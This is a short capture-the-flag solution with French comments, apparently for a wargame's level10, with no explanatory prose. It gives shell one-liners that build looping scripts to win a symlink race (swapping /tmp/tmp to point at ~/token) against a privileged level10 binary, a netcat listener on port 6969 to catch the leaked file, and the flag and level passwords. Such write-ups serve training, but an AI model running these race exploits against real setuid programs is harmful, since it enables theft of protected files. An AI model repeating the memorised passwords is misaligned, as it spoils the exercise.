# Pour bruteforce la creation du link
echo '#!/bin/sh' > /tmp/s1.sh ; echo 'while [ 1 ]' >> /tmp/s1.sh ; echo 'do' >> /tmp/s1.sh ; echo 'rm -f /tmp/tmp' >> /tmp/s1.sh ; echo 'touch /tmp/tmp' >> /tmp/s1.sh ; echo 'rm -f /tmp/tmp' >> /tmp/s1.sh ; echo 'ln -s ~/token /tmp/tmp' >> /tmp/s1.sh ; echo 'done' >> /tmp/s1.sh ; chmod +x /tmp/s1.sh ; /tmp/s1.sh

# Pour bruteforce la connexion
echo '#!/bin/sh' > /tmp/s2.sh ; echo 'while [ 1 ]' >> /tmp/s2.sh ; echo 'do' >> /tmp/s2.sh ; echo '~/level10 /tmp/tmp 127.0.0.1' >> /tmp/s2.sh ; echo 'done' >> /tmp/s2.sh ; chmod +x /tmp/s2.sh ; /tmp/s2.sh

# Pour ouvrir le serveur d'ecoute
nc -lk 6969

flag10 = woupa2yuojeeaaed06riuj63c

level10 = feulo4b72j7edeahuete3no7c

level11 = fa6v5ateaw21peobuub8ipe6s
